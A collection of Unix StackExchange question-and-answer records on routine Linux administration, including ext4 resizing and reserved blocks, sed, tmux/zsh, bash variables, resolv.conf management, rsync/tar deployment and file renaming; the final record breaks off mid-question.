527,190 | I would like to reduce the size of an ext4 partition on my disk and I would like to know if it is possible that my files become corrupted during the operation. I have learned that the ext4 file system uses large extents for each file, so is it possible that a file located at the end of the partition becomes corrupted/deleted during the process? | Yes, it is safe. As long as the process is not interrupted by e.g. power loss, your data will be fine. This is what resize2fs is made for. It will move data around so nothing is lost, and it will warn you if you attempt something potentially harmful. I have used resize2fs numerous times for offline shrinking and never experienced any problems (except human error).
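A sketch of the usual offline shrink procedure (assuming the filesystem is on /dev/sdXN; resize2fs insists on a fresh forced fsck before shrinking):
umount /dev/sdXN          # the filesystem must not be mounted
e2fsck -f /dev/sdXN       # mandatory forced check
resize2fs /dev/sdXN 50G   # shrink the filesystem to the new, smaller size
Only after that do you shrink the partition itself, taking care not to make it smaller than the filesystem. | {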
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527190",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359803/"
]
} |
527,241 | I want to add this character at the end of each line in a file: sed -e 's/$/\/$/g' myfile.txt > myfile_new.txt The result adds /$ , with a literal $ , to each line, but I do not want to add $ . For example, this is a line in the original file: https://myline I executed the command and the result became: https://myline/$ But I want: https://myline/ What is wrong? Please note that the file was originally dos type; I converted it to unix using: dos2unix myfile.txt | You just need 's/$/\//' : the $ anchors the pattern to the end of the line, but it's not an actual character that can be replaced. Similarly for ^ . What you're actually matching (and replacing) is the empty pattern anchored at the end of the line. Also as noted by @Phillippos in the comments, the g is unnecessary here: since the expression is anchored, it can only match at one place.
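A quick demonstration, using the line from the question:
$ printf 'https://myline\n' | sed 's/$/\//'
https://myline/ | {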
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527241",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359699/"
]
} |
527,344 | How to clear both tmux history ( tmux clear-history ) and zsh ( zle clear-screen ) with one key combination? A common way of clearing the screen is ^L , and I tried adding the following to .tmux.conf : bind -Troot C-l send-keys C-l\; clear-history So ^L clears the screen, and clears almost all the history, except the last screenful. A subsequent ^L clears it all. Can the same be achieved with one key combination? bind -Troot C-l send-keys C-l\; clear-history\; send-keys C-l\; clear-history doesn't work. Neither does the following: bind -Troot C-l send-keys C-l C-l\; clear-history | I ended up doing this differently, from zsh itself:
# ~/.zshrc
clear-scrollback-and-screen () {
    zle clear-screen
    tmux clear-history
}
zle -N clear-scrollback-and-screen
bindkey -v '^L' clear-scrollback-and-screen
I did it this way for one reason: I had a C-l mapping in Vim, and an occasional press was clearing the Vim screen. There's a shortcoming to this solution, though: it only works in the shell. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527344",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/9781/"
]
} |
527,356 | Say one has a function/method foo . Can one use the local keyword to declare multiple variables in one line, or do they have to be separated by one declare statement for each variable?
foo(){
    local x y z
}
or
foo(){
    local x
    local y
    local z
}
And further:
foo(){
    local -i x -a y z
}
foo(){
    local -i x=2 -a y=() z
}
… or the equivalent one-by-one declaration. Yes, I could test, but for one I cannot find any Q/A on this, and second, there might be some hidden caveats. | Yes you can. A possible caveat is SC2155, in that you should declare and assign separately. That said, it will work, except for using multiple declare options between the parameters. Also note that the declare parameters will apply to all variables (in this case -i ).
script0:
#!/bin/bash
declare a b c
a=foo
b=bar
c=baz
foo () {
    local a=1 b=2 c=3
    echo "From within func:"
    declare -p a
    declare -p b
    declare -p c
}
foo
echo "From outside func:"
declare -p a
declare -p b
declare -p c
Output:
$ ./script.sh
From within func:
declare -- a="1"
declare -- b="2"
declare -- c="3"
From outside func:
declare -- a="foo"
declare -- b="bar"
declare -- c="baz"
script1:
#!/usr/bin/env bash
declare -i a -a b c
a=foo
b=(bar)
c=baz
foo () {
    local -i a=1 -a b=(2) c=3
    echo "From within func:"
    declare -p a
    declare -p b
    declare -p c
}
foo
echo "From outside func:"
declare -p a
declare -p b
declare -p c
Output:
$ ./script.sh
./script.sh: line 3: declare: `-a': not a valid identifier
./script.sh: line 9: local: `-a': not a valid identifier
From within func:
declare -i a="1"
declare -ai b=([0]="2")
declare -i c="3"
From outside func:
declare -i a="0"
declare -ai b=([0]="0")
declare -i c="0" | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/527356",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/140633/"
]
} |
527,411 | If I have an array like
arr[0]=2019-06-26
arr[1]=15:21:54
How can I convert that into a string whose value is '2019-06-26 15:21:54' | If the first character of the IFS variable is a space (which it is by default), you can use the star index in double quotes.
#! /bin/bash
arr[0]=2019-06-26
arr[1]=15:21:54
string="${arr[*]}"
printf "'%s'" "$string"
Documented under Special Parameters : When the expansion occurs within double quotes, it expands to a single word with the value of each parameter separated by the first character of the IFS special variable. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527411",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/232623/"
]
} |
527,415 | When opening a file using vim, even if the file doesn't exist, vim opens a blank file under the name that I pass as a parameter. How can I make vim open a file only if it exists? | Vim itself has no option for this: editing a name that does not exist simply creates an empty buffer, and the file only comes into existence if you write it. The usual workaround is to do the existence check in the shell and call vim through a small wrapper function instead; see the sketch below.
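A minimal sketch of such a wrapper for your shell startup file (the name vime is arbitrary; use whatever you like):
vime() {
    if [ -e "$1" ]; then
        vim -- "$1"
    else
        printf '%s: no such file\n' "$1" >&2
        return 1
    fi
}
Then run vime somefile instead of vim somefile. | {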
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527415",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/333826/"
]
} |
527,422 | I want to write a script where I can configure the settings in pavucontrol programmatically. It was suggested that I use pactl . I am quite lost on the options, and I would like to know how the tabs and options in the pavucontrol UI translate to pactl options. | You can't "control pavucontrol from the command line". You can control Pulseaudio with pavucontrol , or you can control Pulseaudio with pactl (or pacmd ). pactl has a limited set of commands; pacmd follows the general CLI syntax (see man 5 pulse-cli-syntax or do pacmd --help ). Changing "Analog Stereo Output" is IIRC done by changing the profiles, see set-card-profile . You'll still need other commands to identify your card etc. If you want to change profiles by default, the Pulseaudio configuration files might be a better place to look. Yes, it's quite complicated compared to pavucontrol , and it will require a bit of reading and experimenting.
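A rough sketch of switching a profile with pactl; the card index and the profile names vary per system, so list them first and copy the exact strings from the output (the profile name below is only a typical example):
pactl list cards short                        # find your card's index/name
pactl list cards                              # shows the available "Profiles:" for each card
pactl set-card-profile 0 output:analog-stereo # set a profile on card 0 | {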
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527422",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/11116/"
]
} |
527,423 | journalctl has the -o short-unix flag that I can use to change the output date format on stuff like -t systemd-sleep . But the only way I've found to list boots is --list-boots , and this doesn't seem to obey the -o flag. Is there a way to make journalctl list boots with unix timestamps? Since systemd is here to stay I fear other methods might break in the future, but I'm open to those suggestions too. | Not directly: the -o option only selects the output format for journal entries themselves, and the --list-boots table ignores it, so there is no built-in way to get that listing with unix timestamps. What you can do is rebuild the table yourself by asking for the first entry of each boot in short-unix format; see the sketch below.
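A workaround sketch (it assumes the usual --list-boots layout of index, boot ID, then human-readable dates; the awk picks the epoch timestamp off the first real entry line):
journalctl --list-boots --no-pager | while read -r idx id _; do
    start=$(journalctl -b "$id" -o short-unix --no-pager 2>/dev/null |
            awk '/^[0-9]/ {print $1; exit}')
    printf '%s %s %s\n' "$idx" "$id" "$start"
done | {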
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527423",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359245/"
]
} |
527,493 | I have 25 related pairs of files in a folder called Data. These files are named tcr1_r1.txt and tcr1_r2.txt , tcr2_r1.txt and tcr2_r2.txt , and so on until I reach tcr25… (or however many file pairs I have). My problem is that I need to pair them up and run a command on each pair in a batch file. Example: command tcr1_r1.txt tcr1_r2.txt command tcr2_r1.txt tcr2_r2.txt How can I do this? I'm thinking a loop, but I can't seem to be able to separate and alternate the files on each command. I tried a nested loop but that just runs each "r1" file with all the "r2" files. I have tried to use Jeff Schaller's answer. Here are the exact shell file lines I tried:
#!/bin/bash
for first in /mnt/data/Sequencing_core/Data/Raw_data/062419_TCRB_Vanessa_Danielle/20190624_FS10000703_3_BPC29606-1232/Alignment_1/20190625_132145/Fastq/*R1_001.fastq.gz
do
    echo "$first"
    echo "${first/_R1_001.fastq.gz/_R2_001.fastq.gz}"
done
I must be missing something. I'm getting a "Bad substitution" error message. | Two ways, depending on whether you want to care about the total number of files. In the first way, you know the number of files is 25 (specifically named with 1 through 25):
for index in {1..25}
do
    command tcr"${index}"_r1.txt tcr"${index}"_r2.txt
done
Above, the (bash) shell expands the {1..25} to the full set of numbers; we then substitute those numbers into the appropriate place in the paired filenames. In the second way, you don't know or care how many files there are:
for first in tcr*_r1.txt
do
    command "$first" "${first/_r1.txt/_r2.txt}"
done
Above, we loop over all of the "r1" files and substitute the "_r1.txt" part for the paired "_r2.txt". (A "Bad substitution" error here means the script is being run by a shell other than bash, since ${var/old/new} is a bash feature; keep the #!/bin/bash shebang and start the script with bash, not sh.) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527493",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/302096/"
]
} |
527,521 | Example: I have the file "mybinaryfile", and the contents in hex are: A0 01 00 FF 77 01 77 01 A0 I need to know how many A0 bytes there are in this file, how many 01, and so on. The result could be:
A0: 2
01: 3
00: 1
FF: 1
77: 2
Is there some way to make this count directly in shell or do I need to write a program in whatever language to do this specific task? | This uses od to show one byte (as hex) per line, then sorts and counts: od -t x1 -w1 -v -An mybinaryfile | sort | uniq -c ( -w1 is an extension, it's not mandated by POSIX .)
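For the nine bytes from the question, the output looks like this (od prints lowercase hex, and sort orders the byte values lexically):
$ printf '\xa0\x01\x00\xff\x77\x01\x77\x01\xa0' > mybinaryfile
$ od -t x1 -w1 -v -An mybinaryfile | sort | uniq -c
      1  00
      3  01
      2  77
      2  a0
      1  ff | {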
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/527521",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/273356/"
]
} |
527,555 | I'm trying to add a search line to /etc/resolv.conf I've added it directly, as an append command in /etc/dhcp/dhclient.conf and as a nameservers block in /etc/netplan/50-cloud-init.yaml . After roughly an hour, the dhcp and netplan files are intact, but resolv.conf has reverted to not having my search. I haven't changed /etc/network/interfaces because it says "ifupdown has been replaced by netplan(5) on this system." Any thoughts on what might be overwriting /etc/resolv.conf besides those two things? This is ubuntu 18.04 on EC2. | There is a complex competition to get control of the resolv.conf file; it is a very old competition. Contenders that try to write a resolv.conf are resolvconf , dhcp , interfaces , Network Manager and, recently, systemd-resolved . Other programs may also use resolv.conf , like dnsmasq . Thus, a simple solution doesn't work in all cases.
- If you have the resolvconf program installed (whose main goal is to take ownership of the resolv.conf file): un-install it.
- If your system uses DHCP to get a working IP (most probably you do), every hour or so (depending on system configuration) the IP gets renewed, and that re-writes resolv.conf . Detect if this is the source of the problem.
- The file /etc/network/interfaces may be used to change the resolv.conf configuration. Find out if it is (and erase that part).
- Network Manager could be configured to change what resolv.conf does. Detect (and remove) if it is doing so.
- Systemd-resolved may be configured to take control of resolv.conf via a sym-link. Remove the link if it exists.
- Some recommend making resolv.conf not modifiable (I believe that is more a problem than a solution). Remove the immutable attribute if it has been set.
After you have removed all the above: decide who should keep control of the resolv.conf file, understanding that DHCP could update the file when a new DHCP lease is obtained, if the ISP (or upstream dhcp server owner) dns server is the one that should be used. DHCP leases could be configured to change the IP but not update the resolv.conf file, or an alternate dnsmasq/resolv.conf could be used if a local (127.0.0.1) DNS server (well, mostly like a caching server) is set up with dnsmasq . Of course, more complex configurations could be built with bind9 , Unbound , NSD and many others. Ask for more help if needed. Related:
How to stop dhclient from updating resolvconf on Debian?
How do I stop Debian from overwriting /etc/resolv.conf and overwriting my VPN's nameservers?
resolv.conf overwritten every time
What overwrites /etc/resolv.conf on every boot?
What causing resolv.conf overwritten ? CentOS 7
NetworkManager Keeps Overwriting /etc/resolv.conf
How do I include lines in resolv.conf that won't get lost on reboot?
Arch linux OpenResolv .
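Two quick checks to see who currently owns the file (both commands are standard):
ls -l /etc/resolv.conf    # a symlink into /run/systemd/resolve/ or /run/resolvconf/ tells you who manages it
lsattr /etc/resolv.conf   # an 'i' flag means someone made it immutable with chattr +i | {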
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527555",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/47282/"
]
} |
527,571 | I have a folder x with a number of subfolders ale, bae, galo, and inside each subfolder one .pest file:
x/ale/ale.pest
x/bae/bae.pest
x/galo/galo.pest
I have a list in folder y containing the order in which I should cat the .pest files:
bae
galo
ale
From my x folder I'm trying for file in ./*/*.pest; do while read line; do cat "$line".pest; done; done <./y/list but it's not working. | To answer the follow-up subtly different question: I'm still wondering how it would be if my subdirectories didn't have the same names as in the list though.... Let's make some assumptions: All the subdirectories of x are fair game. All .pest files are fair game. If you have two .pest files with the same name (but in different directories), you don't care what order those two files will be cat ed in. Then you have:
while read -r name; do
    cat x/*/"$name.pest"
done <y/list >concatenated.pest
Adding sanity checking is a little bit trickier but still doable. (I'm not doing that part as I don't know if my assumptions even match your use case.) | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527571",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/193440/"
]
} |
527,628 | Linux Mint tells me I only have 622 MB free disk space, but there should be some gigabytes left. Looking at the partitions I am told that there are about ten gigabytes unused. I googled the problem and didn't find a solution, but I did find the hint that I should check the disk usage with df -h . sudo df -h /home Filesystem Size Used Avail Use% Mounted on /dev/nvme0n1p8 189G 178G 622M 100% /home The output doesn't make any sense to me: the difference between Size and Used is 11GB, but it only shows 622M as Available. The SSD isn't old, so I wouldn't expect such a discrepancy. What should I do? | If the filesystem is ext4, part of it consists of reserved blocks, available only to privileged processes; they exist mainly to keep system daemons working when the disk fills up and to help avoid fragmentation. For this setting, it can be changed live using tune2fs (not all settings can be handled like this when the filesystem is mounted): -m reserved-blocks-percentage Set the percentage of the filesystem which may only be allocated by privileged processes. Reserving some number of filesystem blocks for use by privileged processes is done to avoid filesystem fragmentation, and to allow system daemons, such as syslogd(8), to continue to function correctly after non-privileged processes are prevented from writing to the filesystem. Normally, the default percentage of reserved blocks is 5%. So if you want to lower the reservation to 1% (~ 2GB), thus getting access to ~ 8GB of no-longer-reserved space, you can do this: sudo tune2fs -m 1 /dev/nvme0n1p8 Note: the -m option actually accepts a decimal number as parameter. You can use -m 0.1 to reserve only about ~200MB (and access most of those previously unavailable 10GB). You can also use the -r option instead to reserve directly by blocks. It's probably not advisable to have 0 reserved blocks.
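To see the current reservation before changing it, something like:
sudo tune2fs -l /dev/nvme0n1p8 | grep -i 'reserved block count' | {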
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/527628",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/327870/"
]
} |
527,721 | I thought that gcov-tool is part of the gcc standard package, which is true for Ubuntu. But unfortunately it's not true for RHEL. I didn't succeed in finding the RHEL package name to install gcov-tool. Does anybody know it? What should I write in my terminal to get gcov-tool installed (with exactly the same version as gcc & other dev-tools)? I've tried to install all Development Tools ( yum group install "Development Tools" ); it installed successfully, but gcov-tool wasn't installed. This is the list of RHEL versions where I need gcov-tool: rhel6.6-x86_64 rhel6.7-x86_64 rhel6.8-x86_64 rhel6.9-x86_64 rhel7.0-x86_64 rhel7.1-x86_64 rhel7.2-x86_64 rhel7.3-x86_64 rhel7.3-x86_64 rhel7.4-x86_64 rhel7.5-x86_64 rhel7.6-x86_64 | You need to install one of the devtoolset packages via yum . I recommend devtoolset-8 as it's the latest and it's what you'll have in Ubuntu. devtoolset-6 and devtoolset-7 also have it if you prefer one of those. First, make sure that the rhel-server-rhscl-7-rpms repo is enabled. You can just enable them all: subscription-manager repos --enable rhel* After that, install devtoolset-8 : yum install devtoolset-8* Then, add the gcc from devtoolset to your environment: scl enable devtoolset-8 bash You can then see gcov-tool available: which gcov-tool It will be located in /opt/rh/devtoolset-8/root/usr/bin . Another way to get gcov-tool is to build gcc from source, but that's far more complicated. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527721",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/222193/"
]
} |
527,724 | I use two keypads ( Koolertron AE-SMKD72 Type A ) that I use as one split keyboard. But they are recognized as two separate keyboards, which causes some problems:
- I use an alternative keyboard layout but have a program running that maps keys back to QWERTZ when I press Ctrl, because I don't want to relearn shortcuts such as Ctrl-c . This program doesn't work when I press Ctrl on the left and u on the right keyboard.
- There is a bug in Gnome that causes the screen to freeze when typing quickly on two different keyboards.
- There is only one keyboard listed in /dev/input/by-id (probably because they are named identically).
That's why I would prefer if Linux would consider both keyboard halves as a single keyboard. Is it possible to merge two keyboards into a single input device? Or alternatively, is it possible to merge two USB ports into one in a way that the two devices appear to be only one? | Merging the two USB ports is not possible in software; USB devices always enumerate separately. What you can do is merge them one layer up, at the evdev level: a small daemon grabs both /dev/input/event* nodes (via the EVIOCGRAB ioctl, so nothing else sees them) and re-emits every event through a single virtual keyboard created with uinput. X/Wayland and your Ctrl-remapping program then see exactly one keyboard, which also sidesteps the identical-name collision in /dev/input/by-id . This is what tools built on libevdev or python-evdev do, so look for an existing event-forwarding/merging utility in that ecosystem rather than writing the forwarder from scratch. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527724",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/305474/"
]
} |
527,731 | I would like to have the following output
r 1
r 2
r 3
...
r 100
I have tried so far printf "%s\n" "r {1..100..1}" | r can simply be part of the format string: printf 'r %s\n' {1..100}
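If you need the same output without bash's brace expansion (plain sh), an equivalent sketch using seq:
seq 1 100 | sed 's/^/r /' | {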
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527731",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/298739/"
]
} |
527,813 | Need expert suggestions on the below comparison. Code segment using a loop:
for file in `cat large_file_list`
do
    gzip -d $file
done
Code segment using simple expansion:
gzip -d `cat large_file_list`
Which one will be faster? I have to manipulate a large data set. | Complications
The following will work only sometimes:
gzip -d `cat large_file_list`
Four problems are (in bash and most other Bourne-like shells):
- It will fail if any file name has space, tab or newline characters in it (assuming $IFS has not been modified). This is because of the shell's word splitting .
- It is also liable to fail if any file name has glob-active characters in it. This is because the shell will apply pathname expansion to the file list.
- It will also fail if filenames start with - (if POSIXLY_CORRECT=1 that only applies to the first file) or if any filename is - .
- It will also fail if there are too many file names in it to fit on one command line.
The code below is subject to the same problems as the code above (except for the fourth):
for file in `cat large_file_list`
do
    gzip -d $file
done
Reliable solution
If your large_file_list has exactly one file name per line, and a file called - is not among them, and you're on a GNU system, then use:
xargs -rd'\n' gzip -d -- <large_file_list
- -d'\n' tells xargs to treat each line of input as a separate file name.
- -r tells xargs not to run the command if the input file is empty.
- -- tells gzip that the following arguments are not to be treated as options even if they start with - . - alone would still be treated as - instead of the file called - though.
xargs will put many file names on each command line but not so many that it exceeds the command line limit. This reduces the number of times that a gzip process must be started and therefore makes this fast. It is also safe: the file names will also be protected from word splitting and pathname expansion . | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527813",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/148046/"
]
} |
527,870 | I am new to these commands. I am trying to gzip a local folder and unzip the same on the remote server. The thing is, gzipping and unzipping must happen on the fly. I tried many approaches and one of the closest I believe is this: tar cf dist.tar ~/Documents/projects/myproject/dist/ | ssh [email protected]:~/public_html/ "tar zx ~/Documents/projects/myproject/dist.tar" As you can see above, I am trying to send out the dist folder to the remote server, but before that I am trying to compress the folder on the fly ( which does not seem to be happening in the above command ). local folder: ~/Documents/projects/myproject/dist/ remote folder: ~/public_html ( directly deploying to live ) Of course, no intermediate gzip file should be created; everything should happen on the fly. My intention is to run the above through a file like sh file.command . In other words, I am trying to deploy my compiled project, which is in the dist folder, to live when the sh command is executed. I don't want to do this manually every time I make a change in my project. | If you have rsync then use that instead, as it makes use of existing files to allow it to transfer only differences (that is, parts of files that are different): rsync -az ~/Documents/projects/myproject/dist/ [email protected]:public_html/ Add the --delete flag to completely overwrite the target directory tree each time. If you want to see what's going on, add -v . If you don't have rsync , then this less efficient solution using tar will suffice: ( cd ~/Documents/projects/myproject/dist && tar czf - . ) | ssh [email protected] 'cd public_html && tar xzf -' Notice that the writing and reading of the compressed tarball is via stdout and stdin (the - filename). If you were using GNU tar you could use the -C option to set a correct directory before processing, whereas here we've used old-fashioned (traditional?) cd . Add the v flag (on the receiving side) to see what's going on, i.e. tar xzvf ... . | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527870",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/64665/"
]
} |
527,983 | What happens if the limit of 4 billion files was exceeded in an ext4 partition, with a transfer of 5 billion files for example? | Presumably, you'll be seeing some flavor of "No space left on device" error:
# truncate -s 100M foobar.img
# mkfs.ext4 foobar.img
Creating filesystem with 102400 1k blocks and 25688 inodes
---> number of inodes determined at mkfs time ^^^^^
# mount -o loop foobar.img loop/
# touch loop/{1..25688}
touch: cannot touch 'loop/25678': No space left on device
touch: cannot touch 'loop/25679': No space left on device
touch: cannot touch 'loop/25680': No space left on device
And in practice you hit this limit a lot sooner than "4 billion files". Check your filesystems with both df -h and df -i to find out how much space there is left.
# df -h loop/
Filesystem      Size  Used Avail Use% Mounted on
/dev/loop0       93M  2.1M   84M    3% /dev/shm/loop
# df -i loop/
Filesystem     Inodes IUsed IFree IUse% Mounted on
/dev/loop0      25688 25688     0  100% /dev/shm/loop
In this example, if your files are not 4K size on the average, you run out of inode-space much sooner than storage-space. It's possible to specify another ratio ( mke2fs -N number-of-inodes or -i bytes-per-inode or -T usage-type as defined in /etc/mke2fs.conf ). | {
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/527983",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359833/"
]
} |
527,997 | I want to install gufw on my Fedora, but I do not know how to do that. I tried to install it with the dnf package manager and got this output:
No match for argument: gufw
Error: Unable to find a match
So I tried apt-get and again got a negative result:
E: Couldn't find package gufw
How can I successfully install gufw? I want to control each app's access to the internet, so is there any firewall app other than gufw ? | gufw is not packaged for Fedora: it is a graphical front-end for ufw, the firewall tool used by Ubuntu and Debian (which is also why apt-get does not exist on Fedora). Fedora ships firewalld instead, and its graphical front-end is firewall-config; see the commands below. Note, however, that firewalld filters by zones, ports and services, not per application. For per-application control of outgoing connections, an application-level firewall such as OpenSnitch is closer to what you describe.
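To install and start the stock firewall GUI on Fedora:
sudo dnf install firewall-config
firewall-config | {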
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/527997",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359491/"
]
} |
528,009 | I have a job script which is not producing results, and one of my suspicions is that some of the files it refers to are missing. The relevant part of the job script looks like this:
echo get_data
get_fms_data \
    amip1 \
    seaesf \
    albedo \
    lad \
    topog \
    ggrpsst \
    mom4 \
    /data0/home/rslat/GFDL/archive/edg/fms/river_routes_gt74Sto61S=river_destination_field \
    /data0/home/rslat/GFDL/archive/fms/mom4/mom4p1/mom4p1a/mom4_ecosystem/preprocessing/rho0_profile.nc \
    /data0/home/rslat/GFDL/archive/fms/mom4/mom4p0/mom4p0c/mom4_test8/preprocessing/fe_dep_ginoux_gregg_om3_bc.nc=Soluble_Fe_Flux_PI.nc \
    /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/cover_type_1860_g_ens=cover_type_field \
    /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/soil_color.nc \
    /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/biodata.nc \
    /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/ground_type.nc \
    /data0/home/rslat/GFDL/archive/jwd/regression_data/esm2.1/input/groundwater_residence.nc \
    /data0/home/rslat/GFDL/archive/ms2/esm2.1/input/max_water.nc \
...
As a first step, I want to copy all these paths into a text file and then check if they actually exist. Is there an easy way to do it? I looked at other questions but most of them refer to checking a single file, not a list read from a file. Thank you! | Yes: extract the absolute path arguments from the script, then test each one with [ -e ] in a loop; see the sketch below.
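A rough sketch (it assumes the script is saved as jobscript.sh and that every argument of interest is an absolute path; the sed strips the =name suffix that some arguments carry):
grep -o '/[^ \\]*' jobscript.sh | sed 's/=.*//' | sort -u |
while read -r p; do
    [ -e "$p" ] || printf 'missing: %s\n' "$p"
done > missing_paths.txt
Anything listed in missing_paths.txt does not exist (or is not reachable) on this machine. | {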
"score": 7,
"source": [
"https://unix.stackexchange.com/questions/528009",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/356086/"
]
} |
528,023 | Suppose I have a file like this:
Keyword "name"
aaa bbb
ccc ddd
Keyword "another name"
eee fff
ggg
hhh iii
and so on. I want to change the keyword lines in the file to have counters starting from a given number. For example, if I want to number the keyword lines starting from 5, the keyword lines would look like
Keyword "5 - name"
Keyword "6 - another name"
and so on. All the other lines in the file are not changed. Is there a way to do this? Thanks. | If you have GNU sed, you could use the non-standard R command to read and insert indices from a pre-generated sequence, with a second invocation of sed to rearrange the result: printf '%d\n' {5..100} | sed '/^Keyword/R /dev/stdin' file | sed '/^Keyword/{N; s/Keyword "\([^"]*\)"\n\(.*\)/Keyword "\2 - \1"/}' However I would suggest using perl or awk for this task instead - for example awk -v k=5 '/^Keyword/ {sub(/^Keyword \"/, sprintf("Keyword \"%d - ", k++))} 1' file
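With the sample input and k=5, the awk version prints:
Keyword "5 - name"
aaa bbb
ccc ddd
Keyword "6 - another name"
eee fff
ggg
hhh iii | {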
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528023",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/276876/"
]
} |
528,066 | I need to sort and rename files in a test directory such that, based on the bolded number, the files will be renamed 1-5 in groups of 5. I was able to sort them but now need to rename them 1, 2, 3, 4, or 5. This is what I have so far:
find . -maxdepth 1 -type f -name '*.txt' | sort -nt_ -k2,2 -k7,7
./FoilHole_6862563_Data_6834945_6834947_20190608_255634_Image.txt
./FoilHole_6862563_Data_6834952_6834954_20190608_255710_Image.txt
./FoilHole_6862563_Data_6834959_6834961_20190608_255748_Image.txt
./FoilHole_6862563_Data_6834935_6834937_20190608_255827_Image.txt
./FoilHole_6862563_Data_6834967_6834969_20190608_255906_Image.txt
./FoilHole_6862568_Data_6834945_6834947_20190608_060123_Image.txt
./FoilHole_6862568_Data_6834952_6834954_20190608_060159_Image.txt
./FoilHole_6862568_Data_6834959_6834961_20190608_360237_Image.txt
./FoilHole_6862568_Data_6834935_6834937_20190608_460316_Image.txt
./FoilHole_6862568_Data_6834967_6834969_20190608_560354_Image.txt
What I now need to do is rename them as:
./FoilHole_6862563_Data_6834945_6834947_20190608_1_Image.txt
./FoilHole_6862563_Data_6834952_6834954_20190608_2_Image.txt
./FoilHole_6862563_Data_6834959_6834961_20190608_3_Image.txt
./FoilHole_6862563_Data_6834935_6834937_20190608_4_Image.txt
./FoilHole_6862563_Data_6834967_6834969_20190608_5_Image.txt
./FoilHole_6862568_Data_6834945_6834947_20190608_1_Image.txt
./FoilHole_6862568_Data_6834952_6834954_20190608_2_Image.txt
./FoilHole_6862568_Data_6834959_6834961_20190608_3_Image.txt
./FoilHole_6862568_Data_6834935_6834937_20190608_4_Image.txt
./FoilHole_6862568_Data_6834967_6834969_20190608_5_Image.txt | Since your sort already puts each hole's five files in the right order, you can walk that list with a counter that cycles from 1 to 5 and rewrite the seventh _-separated field of each name; see the sketch below.
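A sketch in bash (it assumes exactly five files per FoilHole group and no whitespace in the names; the echo makes it a dry run, so remove it once the printed mv commands look right):
find . -maxdepth 1 -type f -name '*.txt' | sort -nt_ -k2,2 -k7,7 |
while read -r f; do
    n=$(( n % 5 + 1 ))   # cycles 1,2,3,4,5,1,...
    new=$(printf '%s\n' "$f" | awk -F_ -v OFS=_ -v n="$n" '{ $7 = n; print }')
    echo mv -- "$f" "$new"
done | {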
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/528066",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/360513/"
]
} |
528,094 | I'm using a production server for loading large data sets into Hadoop, to be accessed from a Hive table. We are loading subscribers' web browsing data in the telecom sector. We have a large number of .csv.gz files (file sizes around 300-500MB) which are compressed using gzip . Suppose a file is as below:
Filename: dna_file_01_21090702.csv.gz
Contents:
A,B,C,2
D,E,F,3
We unzip 50 or so files and concatenate them into one file. For troubleshooting purposes, we append the file name as the first column of every row. So the concatenated data file would be:
dna_file_01_21090702.csv.gz,A,B,C,2
dna_file_01_21090702.csv.gz,D,E,F,33
For that purpose I have written the below bash script:
#!/bin/bash
func_gen_new_file_list()
{
    > ${raw_file_list}
    ls -U raw_directory | head -50 >> ${raw_file_list}
}
func_create_dat_file()
{
    cd raw_directory
    gzip -d `cat ${raw_file_list}`
    awk '{printf "%s|%s\n",FILENAME,$0}' `cat ${raw_file_list}|awk -F".gz" '{print $1}'` >> ${data_file}
}
func_check_dir_n_load_data()
{
    ## Code to copy data file to HDFS file system
}
##___________________________ Main Function _____________________________
##__Variable
data_load_log_dir=directory
raw_file_list=${data_load_log_dir}/raw_file_list_name
data_file_name=dna_data_file_`date "+%Y%m%d%H%M%S"`.dat
data_file=${data_load_log_dir}/${data_file_name}
##__Function Calls
func_gen_new_file_list
func_create_dat_file
func_check_dir_n_load_data
